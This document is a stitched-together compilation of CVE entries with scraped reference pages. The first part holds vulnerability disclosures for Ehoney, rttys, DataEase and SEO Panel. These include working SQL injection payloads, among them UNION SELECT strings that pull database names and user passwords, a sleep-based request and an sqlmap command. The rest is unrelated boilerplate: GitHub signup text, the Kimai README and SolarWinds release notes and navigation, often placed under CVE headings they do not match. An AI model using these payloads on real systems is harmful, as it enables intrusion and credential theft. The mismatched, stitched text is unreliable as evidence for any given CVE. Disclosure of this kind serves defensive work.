SQL Injection vulnerability in Ehoney version 2.0.0 in models/protocol.go and models/images.go, allows attackers to execute arbitrary code.

**Summary**

api/v1/protocol/set and api/v1/images/set API endpoints are vulnerable to authenticated SQL injection.

**Affected version:** ehoney v2.0.0

**Analysis**

**1.** For api/v1/protocol/set, the sink point occurs on the **models/protocol.go**

    //models/protocol.go
    
    var p = "%" + payload.Payload + "%"
    sql := fmt.Sprintf("select id, creator, status, create_time, protocol_type, deploy_path, default_flag, min_port, max_port from protocols where CONCAT(id, creator, create_time, protocol_type, deploy_path, min_port, max_port) LIKE '%s' order by create_time DESC", p)
    

**2.** For api/v1/images/set, the sink point occurs on the **models/images.go**

    //models/images.go
    
    var p = "%" + payload.Payload + "%"
    sql := fmt.Sprintf("select id, image_name, image_address, image_port, image_type, default_flag from images where CONCAT(image_name, image_address, image_port, image_type) LIKE '%s'", p)
    

As you can see on the above code snippets, payload.Payload is delivered to SQL statement without sanitized, and payload.Payload could be user-controlled, source point lies on **Payload parameter** in these two api endpoint, then SQL injection arises.

**Proof of Concept**

Take Ehoney's demo environment as example, and use api/v1/protocol/set endpoint to prove the SQL injection, api/v1/images/set is similar.

After attacker logged in with admin/admin123, he could intercept the requests and inject into malicious payload to achieve SQL injection.  
**Payload:**  
TOM' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('***',database()),'***'),NULL,NULL,NULL,NULL,NULL-- a

As is showing below, attacker uses BurpSuite to perform attack, the server respond to us with database name: **sec\_ehoneypot**

CVE-2022-38868: Authenticated SQL injection in seccome/ehoney · Issue #59 · seccome/Ehoney

SQL Injection vulnerability in file home\controls\cart.class.php in UQCMS 2.1.3, allows attackers execute arbitrary commands via the cookie_cart parameter to /index.php/cart/num.

CVE-2020-21120: SQL Injection Prevention - OWASP Cheat Sheet Series

SQL Injection vulnerability in rttys versions 4.0.0, 4.0.1, and 4.0.2 in api.go, allows attackers to execute arbitrary code.

**Summary**

SQL injection occurs on the server side of rtty: rttys.

**Affected Version: v4.0.0<= rttys <= v4.0.2**  
**Attacker could register a malformed account in server side, logged in and trigger the SQL injection.**

I tried to contact to you using huntr platform, but it seems not work, so I post the security issue here.

**Analysis**

The sink point occurs on the /devs api route:

    //api.go
    authorized.GET("/devs", func(c *gin.Context) {
    		type DeviceInfo struct {
    			ID          string `json:"id"`
    			Connected   uint32 `json:"connected"`
    			Uptime      uint32 `json:"uptime"`
    			Description string `json:"description"`
    			Bound       bool   `json:"bound"`
    			Online      bool   `json:"online"`
    		}
    
    		db, err := instanceDB(cfg.DB)
    		if err != nil {
    			log.Error().Msg(err.Error())
    			c.Status(http.StatusInternalServerError)
    			return
    		}
    		defer db.Close()
    
    		sql := "SELECT id, description, username FROM device"
    
    		if cfg.LocalAuth || !isLocalRequest(c) {
    			username := getLoginUsername(c)
    			if username == "" {
    				c.Status(http.StatusUnauthorized)
    				return
    			}
    
    			if !isAdminUsername(cfg, username) {
    				sql += fmt.Sprintf(" WHERE username = '%s'", username)
    			}
    		}
    

At the end of the above code snippet, sql += fmt.Sprintf(" WHERE username = '%s'", username), '%s' shows that username is delivered to SQL statement without sanitized. If we could control username variable，then SQL injection could be exploited. Coincidentally there is no sanitization of username when attacker register malformed account.

The source point occurs on username at /signup api route.

Meanwhile, if !isAdminUsername(cfg, username){ shows that only general username could trigger the SQL injection, that is good for attack.

**Proof of Concept**

1.Create a docker environment locally, using the docker command recommended.  
sudo docker run -it -p 5912:5912 -p 5913:5913 zhaojh329/rttys:latest

2.Access the Web panel opened in http://ip:5913/, click Sign up to register new user. Because it is a docker demo, we have to register a admin account firstly.

3.After registered admin username, then attacker register a new malformed username xyz' union select username,password,3 from account-- with any password like SecurityTest

4.Attacker logged in with username xyz' union select username,password,3 from account--successfully, we could find that the **password of admin and other users** is showing, which is the result of exploit of SQL injection. As is showing below

CVE-2022-38867: Security issue: SQL injection in zhaojh329/rttys · Issue #117 · zhaojh329/rttys

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

SQL Injection vulnerability in SEO Panel 4.9.0 in api/user.api.php in function getUserName in the username parameter, allows attackers to gain sensitive information.

Hi there,

I want to report a SQL Injection Vulnerability in the the current API implementation of Seo-Panel.  
In api/user.api.php, the function getUserName directly calls function __checkUserName in controllers/user.ctrl.php file without filtering on variables. Attacker can pass arbitrary string to username variable through $info. This allows injection to the __checkUsername function directly:

getUserName:

    function getUserName($info) {
        
             		$username = $info['username']; 
            		$returnInfo = array();      
            		// validate the user ifd and user info
         		        if (!empty($username)) {      
            			if ($userInfo = $this->ctrler->__checkUserName($username)) {      
            				$returnInfo['response'] = 'success';
       
            				$returnInfo['result'] = $userInfo;
         
            				return $returnInfo;
        
            			}
          
            		}
        
            		$returnInfo['response'] = 'Error';      
            		$returnInfo['error_msg'] = "Invalid username provided";      
            		return  $returnInfo;
            	}
    

\_\_checkUserName:

    	function __checkUserName($username){
             		$sql = "select id from users where username='$username'";  
            		$userInfo = $this->db->select($sql, true);      
            		return empty($userInfo['id']) ? false :  $userInfo['id'];      
            	}
    

The above-mentioned vulnerability can be reproduced by sqlmap through a request file injection.txt:

    POST /seopanel/api/api.php HTTP/1.1
    Host: localhost
    Accept: */*
    Content-Length: 118
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    SP_API_KEY=<key_here>&API_SECRET=<secret>&category=user&action=getUserName&username=spadmin
    

with sqlmap command: sqlmap -r injection.txt -p 'username'. A boolean-based blind injection shall work, with payload similar to:  
username=123' UNION ALL SELECT CONCAT(CONCAT('abc','abc'),'abc')--  (do note that there's one space at the end of variable to bypass the original quotation mark).

CVE-2021-34117: SQL Injection Vulnerability in API function (user.api.php) · Issue #219 · seopanel/Seo-Panel

SQL Injection vulnerability in nitinparashar30 cms-corephp through commit bdabe52ef282846823bda102728a35506d0ec8f9 (May 19, 2021) allows unauthenticated attackers to gain escilated privledges via a crafted login.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-33925: There is a sql injection vulnerability · Issue #1 · nitinparashar30/cms-corephp

SQL Injection vulnerability in Kliqqi-CMS 2.0.2 in admin/admin_update_module_widgets.php in recordIDValue parameter, allows attackers to gain escalated privileges and execute arbitrary code.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-21119: SQL Injection Vulerable. · Issue #259 · Kliqqi-CMS/Kliqqi-CMS

Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 1.30.0 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges.

    

**Kimai - time-tracker**

Kimai is a professional grade time-tracking application, free and open-source. It handles use-cases of freelancers as well as companies with dozens or hundreds of users. Kimai was build to track your project times and ships with many advanced features, including but not limited to:

JSON API, invoicing, data exports, multi-timer and punch-in punch-out mode, tagging, multi-user - multi-timezones - multi-language (over 30 translations existing!), authentication via SAML/LDAP/Database, two-factor authentication (2FA) with TOTP, customizable role and team permissions, responsive design, user/customer/project specific rates, advanced search & filtering, money and time budgets, advanced reporting, support for plugins and so much more.

**Versions**

There are two versions of Kimai existing:

*   Version 1 — compatible with PHP 7.4, which is in maintenance mode since 2023
*   Version 2 — stable and "almost released" (waiting for some major plugins, which are not yet migrated)

**Links**

*   Home — Kimai project homepage
*   Blog — Read the latest news
*   Documentation — Learn how to use Kimai

**Requirements**

*   PHP 8.1 minimum
*   MariaDB or MySQL
*   A webserver and subdomain (subdirectory is not supported)
*   PHP extensions: gd, intl, json, mbstring, pdo, tokenizer, xml, xsl, zip

**Installation**

*   Recommended setup — with Git and Composer
*   Docker — containerized by @tobybatch

There are also documentations for:

*   developer setups — on your local machine
*   shared hostings — the least favorable option
*   Synology — you could try to host the Docker version instead
*   1-click installer — hosted environments

And if you don't want to host Kimai, you can use the Cloud version of it.

**Updating Kimai**

*   Update Kimai — get the latest version
*   UPGRADING guide — version specific steps

**Plugins**

*   Plugin marketplace — find existing plugins here
*   Developer documentation — how to create a plugin

**Roadmap and releases**

You can see a rough development roadmap in the Milestones sections. It is open for changes and input from the community, your ideas and questions are welcome.

Release versions will be created on a regular basis, every couple of weeks latest. Every code change, whether it's a new feature or a bugfix, will be done on the main branch.

For the time being and until 2.0 is widely adopted, the 1.x branch will receive bug fixes.

**Contributing**

You want to contribute to this repository? This is so great! The best way to start is to open a new issue for bugs or feature requests or a discussion for questions, support and such.

In case you want to contribute, but you wouldn't know how, here are some suggestions:

*   Spread the word: More user means more people testing and contributing to Kimai, which in turn means better stability and more and better features. Please vote for Kimai on any software platform, you can toot or tweet about it, share it on LinkedIn, Reddit or any of your favorite social media platforms. Every bit helps!
*   Answer questions: You know the answer to another user's problem? Share your knowledge.
*   Something can be done better? An essential feature is missing? Create a feature request.
*   Report bugs makes Kimai better for everyone.
*   You don't have to be programmer, the documentation and translation could always use some attention.
*   Sponsor the project: free software costs money to create!

There is one simple rule in our "Code of conduct": Don't be an ass!

**Credits**

Kimai is based on modern technologies and frameworks such as PHP, Symfony and Doctrine, Bootstrap and Tabler, and countless others.

CVE-2020-19825: GitHub - kimai/kimai: Kimai is a web-based multi-user time-tracking application. Works great for everyone: freelancers, companies, organizations - everyone can track their times, generate reports, cre

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

Release date: February 15, 2023

These release notes describe the new features, improvements, and fixed issues in SolarWinds Platform 2023.1. They also provide information about upgrades and describe workarounds for known issues.

Learn more

*   For information on latest hotfixes, see SolarWinds Platform Hotfixes.
*   For release notes for previous SolarWinds Platform versions, see Previous Version documentation.
*   For information about requirements, see SolarWinds Platform 2023.1 System Requirements.
*   For information about working with the SolarWinds Platform, see the SolarWinds Platform Administrator Guide.

**New features and improvements in SolarWinds Platform**

Return to top

SolarWinds Platform 2023.1 offers the following improvements compared to previous releases of SolarWinds Platform.

**AlertStack**

AlertStack is a new feature that can help reduce alert noise and assist in possible root cause analysis to give you a quicker MTTR (mean time to resolution). AlertStack is an opt-in feature that must be turned on in AlertStack settings. AlertStack continually monitors alerts and change events and correlates these using SolarWinds Platform topological information, pulling associated events and alerts together into a single alert cluster. The alert cluster stays activated, and correlated alerts will continue to be added to the cluster, for as long as any associated alerts remain active.

AlertStack is disabled by default and can be enabled after upgrading by navigating to All Settings > Product Specific Settings > AlertStack Settings.

**Other improvements**

*   SolarWinds Platform agent installer packages and Linux/AIX repositories are signed.
    
*   SWIS REST Endpoint is now available on port 17774. You can use a custom HTTPS certificate for this port and disable SWIS REST endpoint on 17778. See Disable port 17778 for SWIS Endpoint.
    
    In 2023.1, you can continue using port 17778. However, please note that it is being deprecated and will not be supported in a future version.
    
*   SolarWinds Platform 2023.1 improves the Kerberos protocol for WMI authentication by adding support for the SAM module. See Configure Kerberos for WMI authentication in the SolarWinds Platform.
    

**New customer installation**

Return to top

For information about installing SolarWinds Platform, see SolarWinds Installer.

**How to upgrade**

Use the SolarWinds Installer to upgrade your entire SolarWinds Platform deployment (all SolarWinds Platform products and any scalability engines) to the current versions.

You must be on Orion Platform 2020.2.1 or later to upgrade to SolarWinds Platform 2023.1. If you are on Orion Platform 2020.2 or earlier, first upgrade to 2020.2.6 and then upgrade to 2023.1.

**Before you upgrade from 2020.2.x**

*   Before upgrading from Orion Platform 2020.2.6 and earlier to SolarWinds Platform 2022.3 or later, make sure the database user you use to connect to your SQL Server has the **db create** privilege. **Without this privilege, the upgrade will not complete.**
    
*   The legacy syslog and traps functionality has been retired and replaced with new functionality called SolarWinds Log Viewer, which can be upgraded to Log Analyzer for additional capabilities. Current rules and history will automatically be migrated to the new logging functionality (SolarWinds Log Viewer or Log Analyzer). The functionality of SolarWinds Log Viewer and Log Analyzer has been improved to more closely match legacy functionality. See LA 2022.3 release notes for details.
    
    If you built syslog and trap alerts using custom SQL queries, they will not function after upgrading to 2022.3 or later. SolarWinds recommends you rewrite the alerts using SWQL (Orion.OLM entities) or using the alerting functionality built into Log Viewer/Log Analyzer.
    
*   Some upgrade situations from the Orion Platform to the SolarWinds Platform are not supported and the installer will stop the upgrade automatically.
    *   If you have a SQL Server older than 2016.
    *   If you have an Orion Platform product version 2020.2 or earlier.

**Fixed issues**

Return to top

SolarWinds Platform 2023.1 fixes the following issues.

 

Case Number

Description

938365, 987784, 1049100, 1084320, 1120320, 1183057

The issue where the Database Maintenance failed to execute 'Finalize Maintenance' was addressed. Fixed in the GA version.

1268655, 1268939, 1270366, 1273013, 1275253

The SQL Script issue preventing the Configuration Wizard from completing was addressed. Fixed in the GA version.

1253873, 1254055, 1254256, 1254257, 1254265, 1254276, 1254278, 1254303, 1254316, 1254326, 1254333, 1254339, 1254372, 1254403, 1254405, 1254414, 1254435, 1254499, 1254502, 1254523

Auto-geolocation issues in the Worldwide Map were addressed. Fixed in the GA version.

1229888, 1235682

The issue where HTML reports layout was broken when using the MailBee SMTP client was addressed.

1208950, 1226555, 1234992

The issue where upgrading Scalability Engines failed when the SolarWinds Administration service on the main polling engine had been updated was addressed.

1230025

The issue where pre-staging of upgrade files failed was addressed.

1204779, 1206691, 1233017, 1243901

The issue where the Configuration wizard failed to connect to RabbitMQ because of a timeout was addressed.

1241585

Offline help instructions were updated.

1211020, 1214429

The issue where new SolarWinds Platform agent installations were not using FQDN was addressed.

1197599, 1248066

The issue where a new SolarWinds Platform databasecould not be installed on Azure SQL due to incorrectly detected SQL version was addressed.

1212089

The issue where a table widget did not update vendor icon properly was addressed.

1105407, 1192112, 1201507, 1213144

The issue where the Custom Properties for Nodes widget didn’t show data was addressed.

1197642

The issue where shared actions are not re-created during alert import when the original shared action doesn’t exist were addressed.

1201173

The issue where the Configuration Wizard enabled Windows Authentication even if the user did not select the option was addressed.

1198432

The issue where the Maintenance Expiration pre-installation check did not work for old bundle licenses was addressed.

1195664

The issue where a group added on a SolarWinds Platform Map was not shown an All Groups was addressed.

1162734

The issue where a 2020.2.\* installer could not be used on an environment where a 2022.\* installer was run was addressed.

1237949

The HTTP 500 Internal Server Error caused by blank StyleSheet setting was addressed.

636868

The issue where the Database Maintenance failed was addressed.

1132904

The issue where SolarWinds Platform agent installed in the root folder ended non-SolarWinds Platform agent processes was addressed.

1190747

The issue where canceling an upgrade stuck on Active Diagnostics tests was addressed.

1185124

The issue where PDF reports generated by alert or report actions were blurred by a Pendo popup was addressed.

444472, 479695

The issue where topology polling timeout was not retained after the upgrade was addressed.

1218043

The issue when running a simple task in the Unmanage Utility was addressed.

561899, 1120328

The issue where special characters in the preview blocked creating a report was addressed.

732106, 1120328

The issue where reports failed due to a 'hexadecimal value 0x01 is an invalid character' message was addressed.

809693

The issue where the SNMPv3 credentials set was updated unexpectedly on the Edit Node view was addressed.

1151608, 1193149, 1202770, 1205056, 1216386, 1231980, 1235579, 1242067, 1252490

The issue where groups based on node custom properties are unsorted in widgets was addressed.

1162222

The issue where a LogAdjuster record for SAML and Account Management was missing was addressed.

615600, 947219, 947737, 989480

The issue where unmanaged status was incorrectly used for group availability was addressed.

46302, 213954, 255637, 691325, 777333

The issue where List Resources cannot proceed a big number of resources thus preventing the user to add a node was addressed.

1094013

The issue with filters in the Worldwide Map widget was addressed.

915697

The issue where Linux agent deployment methods were not working with FIPS was addressed.

938027

The issue where the Discovery job keeps WMI attempts when WMI credentials are deleted was addressed.

**CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2022-38111

SolarWinds Platform Deserialization of Untrusted Data Vulnerability

The SolarWinds Platform was susceptible to the Deserialization of Untrusted Data vulnerability. This vulnerability allows a remote adversary with SolarWinds admin-level account access to messaging service to execute arbitrary commands.

7.2 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-47504

SolarWinds Platform Deserialization of Untrusted Data Vulnerability

The SolarWinds Platform was susceptible to the Deserialization of Untrusted Data vulnerability. This vulnerability allows a remote adversary with SolarWinds admin-level account access to messaging service to execute arbitrary commands.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-47503

SolarWinds Platform Deserialization of Untrusted Data Vulnerability

The SolarWinds Platform was susceptible to the Deserialization of Untrusted Data vulnerability. This vulnerability allows a remote adversary with SolarWinds admin-level account access to messaging service to execute arbitrary commands.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-47506

SolarWinds Platform Directory Traversal Vulnerability

The SolarWinds Platform was susceptible to the Directory Traversal vulnerability. This vulnerability allows a local adversary with authenticated account access to edit the default configuration, enabling the execution of arbitrary commands.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-47507

SolarWinds Platform Deserialization of Untrusted Data Vulnerability

The SolarWinds Platform was susceptible to the Deserialization of Untrusted Data vulnerability. This vulnerability allows a remote adversary with SolarWinds admin-level account access to messaging service to execute arbitrary commands.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-23836

SolarWinds Platform Deserialization of Untrusted Data Vulnerability

The SolarWinds Platform was susceptible to the Deserialization of Untrusted Data vulnerability. This vulnerability allows a remote adversary with SolarWinds admin-level account access to messaging service to execute arbitrary commands.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

**Known issues**

Return to top

 

N/A

2023.1 RC displayed as the GA version in Centralized Upgrades

**Issue**: When you upgrade SolarWinds Platform from 2023.1 RC1 to the GA version, the UI displays upgrade from 2023.1 to 2023.1.

**Workaround**: Not available. Functionality is not impacted.

 

1202271, 1246753

Remanaging nodes triggers the Node Reboot alert

**Issue**: When you unmanage a remanage node, the Node Reboot alert gets triggered.

**Workaround**: Before unmanaging nodes, disable the Node Reboot alert. See Mute alerts.

 

1203621, 1225932, 1234310, 1234575, 1239208, 1241208, 1251663

Database maintenance errors related to CMAN\_Containers

**Issue**: When you run Database Maintenance, errors including CMAN\_Container errors are available in the logs.

**Workaround**: Not available. Functionality is not impacted.

 

1052957, 1240424, 1245960, 1256606, 1257671, 1266763, 1276328, 1267382, 1280926

SolarWinds Information Service performance issues when users without admin rights use PerfStack

**Issue**: If users without administrator rights open PerfStack views after the upgrade to 2023.1, SolarWinds Information Service (SWIS) performance issues might occur. SWIS log includes error messages and the SolarWinds Platform Web Console displays warnings about long-running queries.

**Workaround**: Restart the SWIS service.

**End of life**

Return to top

For modules based on Orion Platform 2020.2.6 and earlier, SolarWinds is announcing future end-of-life plans for your convenience. As always, SolarWinds recommends you upgrade to the latest version of your products at your earliest convenience.

   

Version

EOL Announcements

EOE Effective Dates

EOL Effective Dates

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.6 should begin transitioning to the latest version of SolarWinds Platform.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.5 should begin transitioning to the latest version of SolarWinds Platform.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.4 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.1 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.

See the End of Life Policy for information about SolarWinds product lifecycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

**Deprecation notices**

Return to top

Deprecated platforms and features are still supported in the current release. However, they will be unsupported in a future release. Plan on upgrading deprecated platforms, and avoid using deprecated features. Customizations applied to a deprecated feature might not be migrated if a new feature replaces the deprecated one.

For information about supported versions of SolarWinds products, see Currently supported software versions.

 

Type

Details

Network Atlas

Network Atlas is deprecated as of Orion Platform 2020.2 and will be removed in a future release. SolarWinds recommends that you start using SolarWinds Platform Maps in the SolarWinds Platform Web Console to display maps of physical and logical relationships between entities monitored by the SolarWinds Platform products you have installed.

Port 17778

SWIS REST Endpoint on port 17778 is deprecated as of 2023.1 and will be replaced with port 17774 in a future release. SolarWinds recommends that you start migrating SWIS REST Endpoint to port 17774.

Internet Explorer 11

Internet Explorer 11 is deprecated as of SolarWinds Platform 2023.1 and will be removed in a future release. See SolarWinds Platform Web Console browser requirements for a list of supported browsers.

**Legal notices**

Return to top

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2022-47507: SolarWinds Platform 2023.1 Release Notes

SolarWinds Platform version 2022.4.1 was found to be susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to the SolarWinds Web Console to execute arbitrary commands.

*   Government
*   Customer Portal
*   Partners
    *   Portal Login
    *   Program Overview
    *   Become a Partner
*   Events
*   Contact Us
*   English
    *   Deutsch
    *   Español
    *   Français
    *   日本語
    *   한국어
    *   Português
    *   中文

*   PRODUCTS
    
    *   OBSERVABILITY
        
    *   Network Management
        
    *   Systems Management
        
    *   Database Management
        
    *   IT Service Management
        
    *   Application Management
        
    *   IT Security
        
    *   ALL PRODUCTS & FREE TRIALS
        
    
*   Solutions
    
    *   BY NEED
        
    *   BY INDUSTRY
        
    *   BY TECHNOLOGY
        
    
*   Support
    
*   Community
    
    THWACK
    
    Connect with more than 180,000+ community members. Get help, be heard by us and do your job better using our products.
    
    *   View THWACK
    
*   FREE TRIALS

*   Contact Sales
*   Online Quote
*   

*   PRODUCTS
    *   OBSERVABILITY
        *   SolarWinds Observability
        *   Hybrid Cloud Observability
    *   Network Management
        *   Network Performance Monitor
        *   NetFlow Traffic Analyzer
        *   Network Configuration Manager
        *   IP Address Manager
        *   User Device Tracker
        *   VoIP & Network Quality Manager
        *   Network Automation Manager
        *   Log Analyzer
        *   Network Topology Mapper
        *   Engineer's Toolset
        *   ipMonitor
        *   Kiwi CatTools
        *   Kiwi Syslog Server
        *   Network Bandwidth Analyzer Pack
        *   Log and Network Performance Pack
        *   IP Control Bundle
    *   Systems Management
        *   Server & Application Monitor
        *   Virtualization Manager
        *   Storage Resource Monitor
        *   ipMonitor
        *   Serv-U Managed File Transfer
        *   Serv-U Secured FTP
        *   Server Configuration Monitor
        *   Log Analyzer
        *   Access Rights Manager
        *   AppOptics
        *   Web Performance Monitor
        *   Systems Management Bundle
        *   Server Performance & Configuration Bundle
        *   Log and Systems Performance Pack
        *   Application Performance Optimization Pack
        *   IT Operations Manager
        *   Web Application Monitoring & Performance Pack
    *   Database Management
        *   Database Performance Analyzer
        *   SQL Sentry
        *   Database Performance Monitor
        *   Database Mapper
        *   Task Factory
        *   Database Insights for SQL Server
    *   IT Service Management
        *   Service Desk
        *   Web Help Desk
        *   Dameware Remote Everywhere
        *   Dameware Remote Support
        *   Dameware Mini Remote Control
    *   Application Management
        *   SolarWinds Observability
        *   AppOptics
        *   Server & Application Monitor
        *   Loggly
        *   Log Analyzer
        *   Papertrail
        *   Pingdom
    *   IT Security
        *   Access Rights Manager
        *   Security Event Manager
        *   Server Configuration Monitor
        *   Patch Manager
        *   Identity Monitor
        *   Serv-U Managed File Transfer
        *   Serv-U Secured FTP
        *   Serv-U Gateway
*   Solutions
    *   BY NEED
        *   Hybrid Cloud Observability
        *   SolarWinds Observability
        *   Database Management
        *   Application Performance Management
        *   SolarWinds Orion Platform
        *   Network Management
        *   IT Asset Management
        *   IT Security
        *   IT Operations Management
        *   IT Help Desk
        *   Remote Monitoring
        *   Infrastructure
